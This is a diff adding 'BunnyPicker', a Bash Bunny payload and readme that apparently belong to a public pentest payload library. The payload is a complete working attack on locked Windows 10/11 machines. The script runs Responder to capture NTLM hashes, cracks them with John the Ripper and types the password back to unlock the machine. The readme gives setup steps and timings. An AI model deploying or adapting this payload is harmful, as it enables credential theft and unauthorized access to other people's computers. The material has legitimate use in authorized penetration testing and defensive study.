Merge pull request #585 from rf-bandit/BunnyPicker

Added BunnyPicker

payloads/library/credentials/BunnyPicker/payload.txt

@@ -0,0 +1,111 @@
+#!/bin/bash
+#
+#Author: rf_bandit
+#Version: Version 1.0
+#Credit: Hak5Darren, Mubix, catatonic, mame82
+#Firmware: 1.7
+#Date: May 2023
+#
+# Options
+RESPONDER_OPTIONS="-w -r -d -P"
+LOOTDIR=/root/udisk/loot/bunnypicker
+WORDFILE= <PATH TO DICTIONARY HERE>
+#eg /tools/john/password.lst
+# or install via tools folding in arming mode (/tools/<wordlist>)
+PAYLOAD_DIR=/root/udisk/payloads/$SWITCH_POSITION
+
+# Check for responder and john
+REQUIRETOOL responder
+REQUIRETOOL john
+
+# Setup Attack
+LED SETUP
+
+# Use RNDIS for Windows. Mac/*nix use ECM_ETHERNET
+ATTACKMODE HID RNDIS_ETHERNET 
+#ATTACKMODE ECM_ETHERNET
+
+# Set convenience variables
+GET TARGET_HOSTNAME
+GET TARGET_IP
+
+# Setup named logs in loot directory
+mkdir -p $LOOTDIR
+HOST=${TARGET_HOSTNAME}
+# If hostname is blank set it to "noname"
+[[ -z "$HOST" ]] && HOST="noname"
+COUNT=$(ls -lad $LOOTDIR/$HOST* | wc -l)
+COUNT=$((COUNT+1))
+mkdir -p $LOOTDIR/$HOST-$COUNT
+
+# As a backup also copy logs to a loot directory in /root/loot/
+mkdir -p /root/loot/bunnypicker/$HOST-$COUNT
+
+# Check target IP address. If unset, blink RED and end.
+if [ -z "${TARGET_IP}" ]; then
+    LED FAIL2
+	exit 1
+fi
+
+# Set LED yellow, run attack
+LED ATTACK
+cd /tools/responder
+
+# Clean logs directory
+rm logs/*
+
+# Run Responder with specified options
+python Responder.py -I usb0 $RESPONDER_OPTIONS &
+
+# Wait until NTLM log is found
+until [ -f logs/*NTLM* ]
+do
+     # Ima just loop here until NTLM logs are found
+	 sleep 1
+done
+
+# copy logs to loot directory
+cp logs/* /root/loot/bunnypicker/$HOST-$COUNT
+cp logs/* $LOOTDIR/$HOST-$COUNT
+
+# Sync USB disk filesystem
+sync
+
+#kill responder
+killall python
+killall python
+killall python
+
+#Cracking begins!
+cd /tools/john
+LED STAGE1
+#This should be a small wordlist as we are looking for lowhanging fuit. We can do 100K passwords in ~1 second.
+#We could go CUCMBER PLAID here but its probably not needed
+./john --wordlist=$WORDFILE --pot=/root/loot/bunnypicker/$HOST-$COUNT/john.pot /root/loot/bunnypicker/$HOST-$COUNT/*.txt 
+
+
+# Check john.pot If empty blink RED and end. Move to offline attack.
+if [[ -z $(grep '[^[:space:]]' /root/loot/bunnypicker/$HOST-$COUNT/john.pot) ]]; then
+   LED FAIL3
+   exit 1
+fi
+
+#This will copy our cracked password to the loot folder for future use.
+LED STAGE2
+awk NR==1 /root/loot/bunnypicker/$HOST-$COUNT/john.pot | cut -d: -f2 > $LOOTDIR/$HOST-$COUNT/$HOST-$COUNT-pass.txt
+echo -n "STRING " > $PAYLOAD_DIR/pass.txt
+cat $LOOTDIR/$HOST-$COUNT/$HOST-$COUNT-pass.txt >> $PAYLOAD_DIR/pass.txt
+
+#This should unlock the machine with our cracked password.
+#$PAYLOAD_DIR would not work with QUACK
+QUACK ESC
+DELAY 100
+QUACK $SWITCH_POSITION/pass.txt
+QUACK ENTER
+rm $PAYLOAD_DIR/pass.txt
+
+LED CLEANUP
+sync
+
+# When the light turns green its a hacked machine.
+LED FINISH

payloads/library/credentials/BunnyPicker/readme.md

@@ -0,0 +1,117 @@
+# Bunnypicker (Win10 Lockpicker for Bash Bunny)
+.______    __    __  .__   __. .__   __. ____    ____ .______    __    ______  __  ___  _______ .______      
+|   _  \  |  |  |  | |  \ |  | |  \ |  | \   \  /   / |   _  \  |  |  /      ||  |/  / |   ____||   _  \     
+|  |_)  | |  |  |  | |   \|  | |   \|  |  \   \/   /  |  |_)  | |  | |  ,----'|  '  /  |  |__   |  |_)  |    
+|   _  <  |  |  |  | |  . `  | |  . `  |   \_    _/   |   ___/  |  | |  |     |    <   |   __|  |      /     
+|  |_)  | |  `--'  | |  |\   | |  |\   |     |  |     |  |      |  | |  `----.|  .  \  |  |____ |  |\  \----.
+|______/   \______/  |__| \__| |__| \__|     |__|     | _|      |__|  \______||__|\__\ |_______|| _| `._____|
+         ,
+        /|      __
+       / |   ,-~ /
+      Y :|  //  /
+      | jj /( .^
+      >-"~"-v"
+     /       Y
+    jo  o    |
+   ( ~T~     j
+    >._-' _./
+   /   "~"  |
+  Y     _,  |
+ /| ;-"~ _  l
+/ l/ ,-"~    \
+\//\/      .- \
+ Y        /    Y    -Row
+ l       I     !
+ ]\      _\    /"\
+(" ~----( ~   Y.  )
+~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+                                                                                                             
+Author: rf_bandit
+Version: Version 1.0
+Credit: Hak5Darren, Mubix, catatonic, mame82
+Firmware: 1.7
+Target: Windows 10/11
+Date: May 2023
+
+## Description
+This is based on Quickcreds, Jackalope, and Win10Lockpicker (for the OG P4wnP1)
+Snags credentials from locked machines 
+Implements a responder attack. Saves creds to the loot folder on the USB Disk
+Looks for *NTLM* log files
+Cracks hash with John the Ripper. Best with a smaller dictionary.
+Saves cracked hash to loot folder
+Quacks password and unlocks machine
+
+On a current (May 2023) Win10/Win11 machine, it shouldn't take more about 35 seconds to get a hash.
+If attack stage lasts longer than ~1, try disconnecting/reconnecting from wifi/network.
+We can run through 100K simple passwords in 1 second.
+Best time I got was 29.60 seconds from Bash Bunny boot to machine unlock.
+
+
+
+## Configuration
+.
+Configured for Windows. Not tested on Mac/*nix
+The path to the wordfile needs to be configured, eg /tools/<your-file-here> or /tools/john/password.lst (included) . The most straightforwrd way to get a large wordlist is to put it in the /tools folder in arming mode. A future version could check for a wordlist in /tools and if not found fallback to the included /tools/john/password.lst.
+ 
+
+## Requirements
+
+Responder must be in /tools/responder/
+(Can be otained from https://forums.hak5.org/topic/40971-info-tools/)
+JtR must be in /tools/john
+Requires initial setup (below)
+
+## Initial Setup
+Install responder from https://forums.hak5.org/topic/40971-info-tools/
+
+Replace /etc/apt/sources.list with:
+deb http://archive.debian.org/debian/ jessie main non-free contrib
+deb-src http://archive.debian.org/debian/ jessie main non-free contrib
+deb http://archive.debian.org/debian-security/ jessie/updates main non-free contrib
+deb-src http://archive.debian.org/debian-security/ jessie/updates main non-free contrib
+
+apt update (DO NOT RUN apt upgrade as it will break RNDIS_ETHERNET. Not entirely clear why.)
+
+The john package included can't handle NTLM hashes so we will make our own. 
+Install gcc and git if you don't have them.
+
+apt-get install gcc
+
+apt-get install git
+git config --global http.sslverify "false" (this is insecure but I'm not worried)
+
+git clone https://github.com/openwall/john
+
+cd john
+./configure && make
+mv run /tools/john
+cd ..
+rm -r john (not required but a space saving measure)
+
+
+## STATUS
+
+
+| Status              | Description                              |
+| ------------------- | ---------------------------------------- |
+| LED SETUP           | Starting                                 |
+| LED ATTACK          | Grabbing creds                           |
+| LED STAGE1          | Running JtR                              |
+| LED STAGE2          | Unlocking                                |
+| LED CLEANUP         | Sync to disk                             |                               
+| LED FINISH          | Trap is clean                            |   
+| FAIL1               | Responder not found at /tools/responder  |
+| FAIL2               | Target did not aquire IP address         |
+| FAIL3               | Hash not cracked - move to offline attack|
+
+## ADDITIONAL NOTES
+
+For debugging its better to use LED B for STAGE1 and LED W for STAGE2 because its easier to pinpoint failure.
+A future version could check for a wordlist in /tools and if not found fallback to /tools/john/password.lst.
+Might also steal catatonic's use of the switch (very cool) to initiate password quacking to make the payload more versatile on both locked
+and unlocked machines.
+
+This was fun to make. Thanks to everyone who put in all the hard work before me.
+